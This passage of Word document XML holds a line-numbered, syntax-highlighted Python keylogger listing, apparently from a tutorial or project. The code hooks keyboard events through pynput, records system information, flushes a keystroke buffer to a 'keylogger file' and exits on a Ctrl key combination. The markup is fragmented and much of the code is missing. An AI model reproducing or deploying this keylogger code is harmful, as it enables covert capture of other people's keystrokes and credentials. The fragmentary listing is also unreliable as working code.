        <w:t xml:space="preserve">prefix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w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="838" w:name="l491"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">491  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="838"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>ftemp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s3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KLGEXT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>prefix</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="839" w:name="l492"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">492  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="83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 keylogger file {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</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840" w:name="l493"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">493  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="840"/>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w+'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="841" w:name="l494"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">494  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="841"/>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42" w:name="l495"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">495  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="842"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="843" w:name="l496"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">496  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="84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             </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Empty buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="844" w:name="l497"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">497  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="844"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>register_system_info</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">()      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Save system info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="845" w:name="l498"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">498  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="845"/>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46" w:name="l499"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">499  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="846"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="847" w:name="l500"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">500  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="847"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="848" w:name="l501"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">501  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="848"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Empty the keyboard buffer over the disk file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="849" w:name="l502"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">502  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="849"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>flush_key_buffer_to_disk</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50" w:name="l503"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">503  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="850"/>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51" w:name="l504"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">504  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="851"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="852" w:name="l505"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">505  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="852"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Append to file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="853" w:name="l506"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">506  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="853"/>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a'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="854" w:name="l507"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">507  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="854"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>key_buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="855" w:name="l508"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">508  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="855"/>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56" w:name="l509"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">509  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="856"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="857" w:name="l510"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">510  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="85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58" w:name="l511"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">511  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="858"/>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59" w:name="l512"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">512  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="859"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="860" w:name="l513"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">513  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="860"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="861" w:name="l514"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">514  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="861"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># pynput | keyboard event hook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="862" w:name="l515"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">515  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="862"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>on_press_key_pynput</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>key</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63" w:name="l516"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">516  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="863"/>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r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>key_previous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="864" w:name="l517"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">517  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="864"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="865" w:name="l518"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">518  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="865"/>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866" w:name="l519"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">519  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="866"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Check exit key combination</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="867" w:name="l520"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">520  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="867"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">key_previous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 xml:space="preserve">ctrl_l </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">and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11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>PYNPUT_CTRL_EXIT_CHR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="868" w:name="l521"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">521  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="86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errando aplicación por combinación especial de tecla'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="869" w:name="l522"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">522  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="869"/>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870" w:name="l523"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">523  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="870"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="871" w:name="l524"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">524  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="871"/>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str</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gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">:       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Special key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="872" w:name="l525"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">525  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="872"/>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replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'Key.'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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73" w:name="l526"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">526  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="87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874" w:name="l527"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">527  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="874"/>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="875" w:name="l528"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">528  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="875"/>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76" w:name="l529"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">529  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="876"/>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877" w:name="l530"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">530  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="877"/>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878" w:name="l531"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
